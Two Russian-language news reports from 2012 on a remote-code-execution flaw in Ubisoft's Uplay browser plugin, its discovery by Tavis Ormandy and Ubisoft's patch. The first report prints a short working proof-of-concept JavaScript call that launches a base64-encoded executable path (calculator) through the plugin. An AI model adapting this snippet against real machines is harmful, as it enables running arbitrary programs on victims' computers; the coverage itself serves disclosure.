В игровом приложении Uplay от компании Ubisoft обнаружена ошибка, которая позволяет с любого сайта получить контроль над компьютером пользователя. Демо-страница, которая показывает работу бэкдора (запускает на вашем компьютере приложение «Калькулятор»): http://pastehtml.com/view/c6gxl1a79.html Код: var x = document.createElement('OBJECT'); x.setAttribute("type", "application/x-uplaypc"); document.body.appendChild(x); x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play") Бэкдор можно сравнить с известным руткитом Sony BMG. Вместе с играми Ubisoft на компьютер пользователя устанавливается программа Uplay PC, которая создаёт плагин для браузера, предоставляющий неограниченно широкие полномочия для сайтов, которые обращаются к нему. Список игр Ubisoft: Assassin's Creed II Assassin's Creed: Brotherhood Assassin's Creed: Project Legacy Assassin's Creed Revelations Assassin's Creed III Beowulf: The Game Brothers in Arms: Furious 4 Call of Juarez: The Cartel Driver: San Francisco Heroes of Might and Magic VI Just Dance 3 Prince of Persia: The Forgotten Sands Pure Football R.U.S.E. Shaun White Skateboarding Silent Hunter 5: Battle of the Atlantic The Settlers 7: Paths to a Kingdom Tom Clancy's H.A.W.X. 2 Tom Clancy's Ghost Recon: Future Soldier Tom Clancy's Splinter Cell: Conviction Your Shape: Fitness Evolved Компания Ubisoft уже выпустила патч для Uplay, закрывающий эту уязвимость. Дата: 31.07.2012 http://www.xakep.ru/post/59075/
Разработчик игр Ubisoft экстренно выпускает исправление для Uplay Разработчик компьютерных игр Ubisoft в экстренном порядке разрабатывает патч для устранения проблемы с безопасностью в приложении Uplay. По информации компании, браузерный плагин Uplay позволяет потенциальным хакерам атаковать компьютеры игроков и получать к ним удаленный доступ. Система Uplay используется рядом популярных игр, выпускаемых компанией, в частности Assassin's Creed. "Мы рекомендуем всем пользователям Uplay обновить их приложение при выпуске соответствующего обновления и не запускать его в составе браузера до тех пор. Обновленная версия приложения устранит выявленные серьезные проблемы с безопасностью", - заявили в Ubisoft. Система Uplay позволяет игрокам зарабатывать очки и награды за различные достижения в играх, если они играют в онлайн-режиме. Помимо Assassin's Creed, системой Uplay также пользуются такие игры, как Call of Juarez: San Francisco, Just Dance 3 и несколько игр семейства Tom Clancy. Баг с безопасностью был обнаружен инженером Google Тэвисом Орманди, который пишет, что обнаружил проблему в системе безопасности случайно. "Будучи в отпуске, я купил Assassin's Creed Revelations. Играть особо времени не было, но ряд интересных моментов в игре и ее программном обеспечении найти удалось. Я заметил, что браузерный плагин, устанавливаемый в процессе инсталляции, и работающий с Uplay, открывает доступ ко многим удаленным сервисам, а позже выяснилось, что и любой веб-сайт удаленно может через плагин открыть любую программу на ПК", - пишет он. Также в его блоге приводится демонстрация уязвимости. В Ubisoft говорят, что на данный момент у компании нет информации о том, что кто-либо из пользователей в результате бага Uplay в реальности пострадал, но тем не менее компания предупреждает, что проблема потенциально может привести к запуску вредоносных кодов на компьютере. Обновление от 1:00 мск: компания только что на своей странице в Facebook сообщила о выпуске обновленного Uplay 2.0.4, где была устранена проблема. Скачать обновленный клиент можно по адресу Uplay.com (00:05) 31.07.2012 http://cybersecurity.ru/crypto/156513.html